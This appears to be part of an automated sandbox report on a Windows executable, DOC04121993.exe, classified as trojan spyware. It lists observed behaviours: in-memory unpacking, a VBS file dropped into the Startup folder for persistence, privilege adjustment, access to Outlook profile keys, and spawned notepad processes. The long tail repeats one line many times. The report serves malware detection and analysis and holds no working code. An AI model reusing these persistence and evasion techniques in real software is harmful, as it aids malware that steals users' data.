                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, gtu.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, DPAPI.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, DPAPI.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                      Source: 2.2.DOC04121993.exe.2240000.3.unpack, gtu.csCryptographic APIs: 'TransformFinalBlock'
                      Source: 2.2.DOC04121993.exe.2240000.3.unpack, gtu.csCryptographic APIs: 'CreateDecryptor', 'TransformFinalBlock'
                      Source: 2.2.DOC04121993.exe.2240000.3.unpack, gtu.csCryptographic APIs: 'CreateDecryptor', 'TransformBlock'
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@16/2@1/1
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00420390 GetLastError,FormatMessageA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0233B1E6 AdjustTokenPrivileges,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 2_2_0233B1AF AdjustTokenPrivileges,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00408D0A GetDiskFreeSpaceA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00416B24 FindResourceA,LoadResource,SizeofResource,LockResource,
                      Source: C:\Windows\SysWOW64\notepad.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbsJump to behavior
                      Source: C:\Users\user\Desktop\DOC04121993.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs'
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
                      Source: C:\Users\user\Desktop\DOC04121993.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                      Source: C:\Users\user\Desktop\DOC04121993.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                      Source: C:\Users\user\Desktop\DOC04121993.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                      Source: C:\Users\user\Desktop\DOC04121993.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Users\user\Desktop\DOC04121993.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                      Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: DOC04121993.exeVirustotal: Detection: 69%
                      Source: DOC04121993.exeReversingLabs: Detection: 81%
                      Source: unknownProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: unknownProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe' 2 1000 3714343
                      Source: unknownProcess created: C:\Windows\System32\wscript.exe 'C:\Windows\System32\WScript.exe' 'C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs'
                      Source: unknownProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: unknownProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe
                      Source: unknownProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: unknownProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe' 2 1956 3726421
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe' 2 1000 3714343
                      Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess created: C:\Windows\SysWOW64\notepad.exe C:\Windows\system32\notepad.exe
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe'
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess created: C:\Users\user\Desktop\DOC04121993.exe 'C:\Users\user\Desktop\DOC04121993.exe' 2 1956 3726421
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                      Source: C:\Users\user\Desktop\DOC04121993.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                      Source: C:\Users\user\Desktop\DOC04121993.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll

                      Data Obfuscation:

                      barindex
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeUnpacked PE file: 2.2.DOC04121993.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;
                      Detected unpacking (creates a PE file in dynamic memory)Show sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeUnpacked PE file: 2.2.DOC04121993.exe.2240000.3.unpack
                      Source: C:\Users\user\Desktop\DOC04121993.exeUnpacked PE file: 7.2.DOC04121993.exe.2290000.3.unpack
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\Desktop\DOC04121993.exeUnpacked PE file: 2.2.DOC04121993.exe.400000.0.unpack
                      .NET source code contains potential unpackerShow sources
                      Source: 0.2.DOC04121993.exe.2690000.3.unpack, gtu.cs.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 2.2.DOC04121993.exe.2240000.3.unpack, gtu.cs.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 2.2.DOC04121993.exe.400000.0.unpack, gtu.cs.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 2.2.DOC04121993.exe.9e0000.2.unpack, gtu.cs.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.2.DOC04121993.exe.21b0000.2.unpack, gtu.cs.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: 7.2.DOC04121993.exe.2290000.3.unpack, gtu.cs.Net Code: ncv System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00446CD4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00447320 push 004473ADh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00426024 push 00426050h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00428038 push 00428064h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00466080 push 004660ACh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0040C090 push 0040C20Ch; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0046C150 push 0046C1C6h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00450134 push 0045019Fh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0040C20E push 0040C27Fh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0040C210 push 0040C27Fh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004482CC push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004262DC push 00426308h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0040C2EE push 0040C31Ch; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0040C2F0 push 0040C31Ch; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0041A288 push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00410324 push 00410385h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00410388 push 00410589h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0042646C push 00426498h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0044856C push ecx; mov dword ptr [esp], edx
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00470574 push 004705A0h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0041058C push 004106D0h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0040660A push 0040665Dh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0040660C push 0040665Dh; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004106A4 push 004106D0h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0043277C push 004327A8h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004067DC push 00406808h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004327EC push 00432818h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004327B4 push 004327E0h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0044884C push 00448878h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00406854 push 00406880h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0043285C push 00432888h; ret
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00432824 push 00432850h; ret

                      Boot Survival:

                      barindex
                      Drops VBS files to the startup folderShow sources
                      Source: C:\Windows\SysWOW64\notepad.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbs
                      Source: C:\Windows\SysWOW64\notepad.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbsJump to dropped file
                      Source: C:\Windows\SysWOW64\notepad.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbsJump to behavior
                      Source: C:\Windows\SysWOW64\notepad.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbsJump to behavior
                      Source: C:\Windows\SysWOW64\notepad.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\STARTUP.vbsJump to behavior
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0045AB54 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004266A4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00442778 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_004415EC IsIconic,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00457C48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00441E94 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_0045AB54 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_004266A4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00442778 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_004415EC IsIconic,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00457C48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 3_2_00441E94 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_0045AB54 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_004266A4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00442778 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_004415EC IsIconic,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00457C48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 5_2_00441E94 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_004266A4 IsIconic,GetWindowPlacement,GetWindowRect,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00442778 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_0045AB54 PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_0045B248 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,DefWindowProcA,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_0045B2F8 IsIconic,SetActiveWindow,IsWindowEnabled,DefWindowProcA,SetWindowPos,SetFocus,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_004415EC IsIconic,GetCapture,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00457C48 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 8_2_00441E94 IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,
                      Source: C:\Users\user\Desktop\DOC04121993.exeCode function: 0_2_00446CD4 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,
                      Source: C:\Users\user\Desktop\DOC04121993.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Users\user\Desktop\DOC04121993.exeProcess information set: NOOPENFILEERRORBOX
